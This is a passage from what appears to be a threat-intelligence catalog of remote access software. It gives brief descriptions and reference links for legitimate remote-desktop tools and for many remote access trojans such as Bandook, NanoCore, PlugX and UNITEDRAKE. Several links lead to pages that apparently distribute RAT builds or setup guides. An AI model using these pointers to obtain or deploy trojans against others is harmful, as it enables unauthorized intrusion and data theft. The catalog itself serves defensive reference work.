<p>Ammyy Admin is a completely portable remote access program that&#8217;s extremely simple to setup. It works by connecting one computer to another via an ID supplied by the program.</p>
</div>
<div class="paragraph">
<p>Ammyy Admin is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Ammyy</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2267. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://ammyy-admin.soft32.com/">http://ammyy-admin.soft32.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_ultra_vnc"><a class="anchor" href="#_ultra_vnc"></a><a class="link" href="#_ultra_vnc">Ultra VNC</a></h3>
<div class="paragraph">
<p>UltraVNC works a bit like Remote Utilities, where a server and viewer is installed on two PCs, and the viewer is used to control the server.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2268. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.uvnc.com/">http://www.uvnc.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_aeroadmin"><a class="anchor" href="#_aeroadmin"></a><a class="link" href="#_aeroadmin">AeroAdmin</a></h3>
<div class="paragraph">
<p>AeroAdmin is probably the easiest program to use for free remote access. There are hardly any settings, and everything is quick and to the point, which is perfect for spontaneous support.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2269. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.aeroadmin.com/en/">http://www.aeroadmin.com/en/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_windows_remote_desktop"><a class="anchor" href="#_windows_remote_desktop"></a><a class="link" href="#_windows_remote_desktop">Windows Remote Desktop</a></h3>
<div class="paragraph">
<p>Windows Remote Desktop is the remote access software built into the Windows operating system. No additional download is necessary to use the program.</p>
</div>
</div>
<div class="sect2">
<h3 id="_remotepc"><a class="anchor" href="#_remotepc"></a><a class="link" href="#_remotepc">RemotePC</a></h3>
<div class="paragraph">
<p>RemotePC, for good or bad, is a more simple free remote desktop program. You&#8217;re only allowed one connection (unless you upgrade) but for many of you, that&#8217;ll be just fine.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2270. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.remotepc.com/">https://www.remotepc.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_seecreen"><a class="anchor" href="#_seecreen"></a><a class="link" href="#_seecreen">Seecreen</a></h3>
<div class="paragraph">
<p>Seecreen (previously called Firnass) is an extremely tiny (500 KB), yet powerful free remote access program that&#8217;s absolutely perfect for on-demand, instant support.</p>
</div>
<div class="paragraph">
<p>Seecreen is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Firnass</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2271. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://seecreen.com/">http://seecreen.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_chrome_remote_desktop"><a class="anchor" href="#_chrome_remote_desktop"></a><a class="link" href="#_chrome_remote_desktop">Chrome Remote Desktop</a></h3>
<div class="paragraph">
<p>Chrome Remote Desktop is an extension for the Google Chrome web browser that lets you setup a computer for remote access from any other Chrome browser.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2272. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://chrome.google.com/webstore/detail/chrome-remote-desktop/gbchcmhmhahfdphkhkmpfmihenigjmpp?hl=en">https://chrome.google.com/webstore/detail/chrome-remote-desktop/gbchcmhmhahfdphkhkmpfmihenigjmpp?hl=en</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_anydesk"><a class="anchor" href="#_anydesk"></a><a class="link" href="#_anydesk">AnyDesk</a></h3>
<div class="paragraph">
<p>AnyDesk is a remote desktop program that you can run portably or install like a regular program.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2273. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://anydesk.com/remote-desktop">https://anydesk.com/remote-desktop</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_litemanager"><a class="anchor" href="#_litemanager"></a><a class="link" href="#_litemanager">LiteManager</a></h3>
<div class="paragraph">
<p>LiteManager is another remote access program, and it&#8217;s strikingly similar to Remote Utilities, which I explain on the first page of this list. However, unlike Remote Utilities, which can control a total of only 10 PCs, LiteManager supports up to 30 slots for storing and connecting to remote computers, and also has lots of useful features.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2274. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.litemanager.com/">http://www.litemanager.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_comodo_unite"><a class="anchor" href="#_comodo_unite"></a><a class="link" href="#_comodo_unite">Comodo Unite</a></h3>
<div class="paragraph">
<p>Comodo Unite is another free remote access program that creates a secure VPN between multiple computers. Once a VPN is established, you can remotely have access to applications and files through the client software.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2275. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.comodo.com/home/download/download.php?prod=comodounite">https://www.comodo.com/home/download/download.php?prod=comodounite</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_showmypc"><a class="anchor" href="#_showmypc"></a><a class="link" href="#_showmypc">ShowMyPC</a></h3>
<div class="paragraph">
<p>ShowMyPC is a portable and free remote access program that&#8217;s nearly identical to UltraVNC but uses a password to make a connection instead of an IP address.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2276. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://showmypc.com/">https://showmypc.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_join_me"><a class="anchor" href="#_join_me"></a><a class="link" href="#_join_me">join.me</a></h3>
<div class="paragraph">
<p>join.me is a remote access program from the producers of LogMeIn that provides quick access to another computer over an internet browser.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2277. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.join.me/">https://www.join.me/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_desktopnow"><a class="anchor" href="#_desktopnow"></a><a class="link" href="#_desktopnow">DesktopNow</a></h3>
<div class="paragraph">
<p>DesktopNow is a free remote access program from NCH Software. After optionally forwarding the proper port number in your router, and signing up for a free account, you can access your PC from anywhere through a web browser.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2278. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nchsoftware.com/remotedesktop/index.html">http://www.nchsoftware.com/remotedesktop/index.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_beamyourscreen"><a class="anchor" href="#_beamyourscreen"></a><a class="link" href="#_beamyourscreen">BeamYourScreen</a></h3>
<div class="paragraph">
<p>Another free and portable remote access program is BeamYourScreen. This program works like some of the others in this list, where the presenter is given an ID number they must share with another user so they can connect to the presenter&#8217;s screen.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2279. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.beamyourscreen.com/">http://www.beamyourscreen.com/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_casa_rat"><a class="anchor" href="#_casa_rat"></a><a class="link" href="#_casa_rat">Casa RAT</a></h3>
</div>
<div class="sect2">
<h3 id="_bandook_rat"><a class="anchor" href="#_bandook_rat"></a><a class="link" href="#_bandook_rat">Bandook RAT</a></h3>
<div class="paragraph">
<p>Bandook is a FWB#++ reverse connection rat (Remote Administration Tool), with a small size server when packed 30 KB, and a long list of amazing features</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2280. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.nuclearwintercrew.com/Products-View/57/Bandook_RAT_v1.35" class="bare">http://www.nuclearwintercrew.com/Products-View/57/Bandook_RAT_v1.35</a><em>NEW_/[<a href="http://www.nuclearwintercrew.com/Products-View/57/Bandook_RAT_v1.35" class="bare">http://www.nuclearwintercrew.com/Products-View/57/Bandook_RAT_v1.35</a></em>NEW_/]</p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cerberus_rat"><a class="anchor" href="#_cerberus_rat"></a><a class="link" href="#_cerberus_rat">Cerberus RAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2281. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.hacktohell.org/2011/05/setting-up-cerberus-ratremote.html">http://www.hacktohell.org/2011/05/setting-up-cerberus-ratremote.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_syndrome_rat"><a class="anchor" href="#_syndrome_rat"></a><a class="link" href="#_syndrome_rat">Syndrome RAT</a></h3>
</div>
<div class="sect2">
<h3 id="_snoopy"><a class="anchor" href="#_snoopy"></a><a class="link" href="#_snoopy">Snoopy</a></h3>
<div class="paragraph">
<p>Snoopy is a Remote Administration Tool. Software for controlling user computer remotely from other computer on local network or Internet.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2282. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.spy-emergency.com/research/S/Snoopy.html">http://www.spy-emergency.com/research/S/Snoopy.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_5p00f3r_n_rat"><a class="anchor" href="#_5p00f3r_n_rat"></a><a class="link" href="#_5p00f3r_n_rat">5p00f3r.N$ RAT</a></h3>
</div>
<div class="sect2">
<h3 id="_p_storrie_rat"><a class="anchor" href="#_p_storrie_rat"></a><a class="link" href="#_p_storrie_rat">P. Storrie RAT</a></h3>
<div class="olist upperalpha">
<ol class="upperalpha" type="A">
<li>
<p>Storrie RAT is also known as:</p>
<div class="ulist">
<ul>
<li>
<p>P.Storrie RAT</p>
</li>
</ul>
</div>
</li>
</ol>
</div>
</div>
<div class="sect2">
<h3 id="_xhacker_pro_rat"><a class="anchor" href="#_xhacker_pro_rat"></a><a class="link" href="#_xhacker_pro_rat">xHacker Pro RAT</a></h3>
</div>
<div class="sect2">
<h3 id="_netdevil"><a class="anchor" href="#_netdevil"></a><a class="link" href="#_netdevil">NetDevil</a></h3>
<div class="paragraph">
<p>Backdoor.NetDevil allows a hacker to remotely control an infected computer.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2283. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/writeup.jsp?docid=2002-021310-3452-99">https://www.symantec.com/security_response/writeup.jsp?docid=2002-021310-3452-99</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_nanocore"><a class="anchor" href="#_nanocore"></a><a class="link" href="#_nanocore">NanoCore</a></h3>
<div class="paragraph">
<p>In September of 2015, a DigiTrust client visited a web link that was providing an Adobe Flash Player update. The client, an international retail organization, attempted to download and run what appeared to be a regular update. The computer trying to download this update was a back office system that processed end of day credit card transactions. This system also had the capability of connecting to the corporate network which contained company sales reports.
DigiTrust experts were alerted to something malicious and blocked the download. The investigation found that what appeared to be an Adobe Flash Player update, was a Remote Access Trojan called NanoCore. If installation had been successful, customer credit card data, personal information, and internal sales information could have been captured and monetized. During the analysis of NanoCore, our experts found that there was much more to this RAT than simply being another Remote Access Trojan.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2284. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.digitrustgroup.com/nanocore-not-your-average-rat/">https://www.digitrustgroup.com/nanocore-not-your-average-rat/</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cobian_rat"><a class="anchor" href="#_cobian_rat"></a><a class="link" href="#_cobian_rat">Cobian RAT</a></h3>
<div class="paragraph">
<p>The Zscaler ThreatLabZ research team has been monitoring a new remote access Trojan (RAT) family called Cobian RAT since February 2017. The RAT builder for this family was first advertised on multiple underground forums where cybercriminals often buy and sell exploit and malware kits. This RAT builder caught our attention as it was being offered for free and had lot of similarities to the njRAT/H-Worm family</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2285. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat">https://www.zscaler.com/blogs/research/cobian-rat-backdoored-rat</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_netsupport_manager"><a class="anchor" href="#_netsupport_manager"></a><a class="link" href="#_netsupport_manager">Netsupport Manager</a></h3>
<div class="paragraph">
<p>NetSupport Manager continues to deliver the very latest in remote access, PC support and desktop management capabilities. From a desktop, laptop, tablet or smartphone, monitor multiple systems in a single action, deliver hands-on remote support, collaborate and even record or play back sessions. When needed, gather real-time hardware and software inventory, monitor services and even view system config remotely to help resolve issues quickly.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2286. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.netsupportmanager.com/index.asp">http://www.netsupportmanager.com/index.asp</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_vortex"><a class="anchor" href="#_vortex"></a><a class="link" href="#_vortex">Vortex</a></h3>
</div>
<div class="sect2">
<h3 id="_assassin"><a class="anchor" href="#_assassin"></a><a class="link" href="#_assassin">Assassin</a></h3>
</div>
<div class="sect2">
<h3 id="_net_devil"><a class="anchor" href="#_net_devil"></a><a class="link" href="#_net_devil">Net Devil</a></h3>
<div class="paragraph">
<p>Net Devil is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>NetDevil</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2287. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20702">https://www.symantec.com/security_response/attacksignatures/detail.jsp?asid=20702</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_a4zeta"><a class="anchor" href="#_a4zeta"></a><a class="link" href="#_a4zeta">A4Zeta</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2288. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.megasecurity.org/trojans/a/a4zeta/A4zeta_b2.html">http://www.megasecurity.org/trojans/a/a4zeta/A4zeta_b2.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_greek_hackers_rat"><a class="anchor" href="#_greek_hackers_rat"></a><a class="link" href="#_greek_hackers_rat">Greek Hackers RAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2289. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2013/04/greek-hackers-rat-1.0.html?m=0">http://www.connect-trojan.net/2013/04/greek-hackers-rat-1.0.html?m=0</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mra_rat"><a class="anchor" href="#_mra_rat"></a><a class="link" href="#_mra_rat">MRA RAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2290. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2013/04/greek-hackers-rat-1.0.html?m=0">http://www.connect-trojan.net/2013/04/greek-hackers-rat-1.0.html?m=0</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_sparta_rat"><a class="anchor" href="#_sparta_rat"></a><a class="link" href="#_sparta_rat">Sparta RAT</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2291. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2015/09/sparta-rat-1.2-by-azooz-ejram.html">http://www.connect-trojan.net/2015/09/sparta-rat-1.2-by-azooz-ejram.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_lokitech"><a class="anchor" href="#_lokitech"></a><a class="link" href="#_lokitech">LokiTech</a></h3>
</div>
<div class="sect2">
<h3 id="_madrat"><a class="anchor" href="#_madrat"></a><a class="link" href="#_madrat">MadRAT</a></h3>
</div>
<div class="sect2">
<h3 id="_tequila_bandita"><a class="anchor" href="#_tequila_bandita"></a><a class="link" href="#_tequila_bandita">Tequila Bandita</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2292. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2013/07/tequila-bandita-1.3b2.html">http://www.connect-trojan.net/2013/07/tequila-bandita-1.3b2.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_toquito_bandito"><a class="anchor" href="#_toquito_bandito"></a><a class="link" href="#_toquito_bandito">Toquito Bandito</a></h3>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2293. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.megasecurity.org/trojans/t/toquitobandito/Toquitobandito_all.html">http://www.megasecurity.org/trojans/t/toquitobandito/Toquitobandito_all.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_mofotro"><a class="anchor" href="#_mofotro"></a><a class="link" href="#_mofotro">MofoTro</a></h3>
<div class="paragraph">
<p>MofoTro is a new rat coded by Cool_mofo_2.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2294. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.megasecurity.org/trojans/m/mofotro/Mofotro_beta.html">http://www.megasecurity.org/trojans/m/mofotro/Mofotro_beta.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.megasecurity.org/trojans/m/mofotro/Mofotroresurrection.html">http://www.megasecurity.org/trojans/m/mofotro/Mofotroresurrection.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.megasecurity.org/trojans/m/mofotro/Mofotro_beta1.5.html">http://www.megasecurity.org/trojans/m/mofotro/Mofotro_beta1.5.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_hav_rat"><a class="anchor" href="#_hav_rat"></a><a class="link" href="#_hav_rat">Hav-RAT</a></h3>
<div class="paragraph">
<p>Written in Delphi</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2295. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.megasecurity.org/trojans/h/hav/Havrat1.2.html">http://www.megasecurity.org/trojans/h/hav/Havrat1.2.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_comrat_2"><a class="anchor" href="#_comrat_2"></a><a class="link" href="#_comrat_2">ComRAT</a></h3>
<div class="paragraph">
<p>ComRAT is a remote access tool suspected of being a decedent of Agent.btz and used by Turla.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2296. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0126">https://attack.mitre.org/wiki/Software/S0126</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_4h_rat_2"><a class="anchor" href="#_4h_rat_2"></a><a class="link" href="#_4h_rat_2">4H RAT</a></h3>
<div class="paragraph">
<p>4H RAT is malware that has been used by Putter Panda since at least 2007.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2297. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://attack.mitre.org/wiki/Software/S0065">https://attack.mitre.org/wiki/Software/S0065</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_darknet_rat"><a class="anchor" href="#_darknet_rat"></a><a class="link" href="#_darknet_rat">Darknet RAT</a></h3>
<div class="paragraph">
<p>Darknet RAT is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Dark NET RAT</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2298. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://www.connect-trojan.net/2015/06/dark-net-rat-v.0.3.9.0.html">http://www.connect-trojan.net/2015/06/dark-net-rat-v.0.3.9.0.html</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_cia_rat"><a class="anchor" href="#_cia_rat"></a><a class="link" href="#_cia_rat">CIA RAT</a></h3>
</div>
<div class="sect2">
<h3 id="_minimo"><a class="anchor" href="#_minimo"></a><a class="link" href="#_minimo">Minimo</a></h3>
</div>
<div class="sect2">
<h3 id="_minirat"><a class="anchor" href="#_minirat"></a><a class="link" href="#_minirat">miniRAT</a></h3>
</div>
<div class="sect2">
<h3 id="_pain_rat"><a class="anchor" href="#_pain_rat"></a><a class="link" href="#_pain_rat">Pain RAT</a></h3>
</div>
<div class="sect2">
<h3 id="_plugx_2"><a class="anchor" href="#_plugx_2"></a><a class="link" href="#_plugx_2">PlugX</a></h3>
<div class="paragraph">
<p>PLUGX is a remote access tool (RAT) used in targeted attacks aimed toward government-related institutions and key industries. It was utilized the same way as Poison Ivy, a RAT involved in a campaign dating back to 2008.</p>
</div>
<div class="paragraph">
<p>PlugX is also known as:</p>
</div>
<div class="ulist">
<ul>
<li>
<p>Korplug</p>
</li>
</ul>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2299. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.lastline.com/labsblog/an-analysis-of-plugx-malware/">https://www.lastline.com/labsblog/an-analysis-of-plugx-malware/</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PLUGX">https://www.trendmicro.com/vinfo/us/threat-encyclopedia/malware/PLUGX</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_unitedrake"><a class="anchor" href="#_unitedrake"></a><a class="link" href="#_unitedrake">UNITEDRAKE</a></h3>
<div class="paragraph">
<p>The existence of the UNITEDRAKE RAT first came to light in 2014 as part of a series of classified documents leaked by former NSA contractor Edward Snowden.</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2300. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="http://thehackernews.com/2017/09/shadowbrokers-unitedrake-hacking.html">http://thehackernews.com/2017/09/shadowbrokers-unitedrake-hacking.html</a></p></td>
</tr>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock"><a href="https://www.itnews.com.au/news/shadowbrokers-release-unitedrake-nsa-malware-472771">https://www.itnews.com.au/news/shadowbrokers-release-unitedrake-nsa-malware-472771</a></p></td>
</tr>
</tbody>
</table>
</div>
<div class="sect2">
<h3 id="_megatrojan"><a class="anchor" href="#_megatrojan"></a><a class="link" href="#_megatrojan">MegaTrojan</a></h3>
<div class="paragraph">
<p>Written in Visual Basic</p>
</div>
<table class="tableblock frame-all grid-all spread">
<caption class="title">Table 2301. Table References</caption>
<colgroup>
<col style="width: 100%;">
</colgroup>
<tbody>
<tr>
<td class="tableblock halign-left valign-top"><p class="tableblock">Links</p></td>
</tr>
<tr>
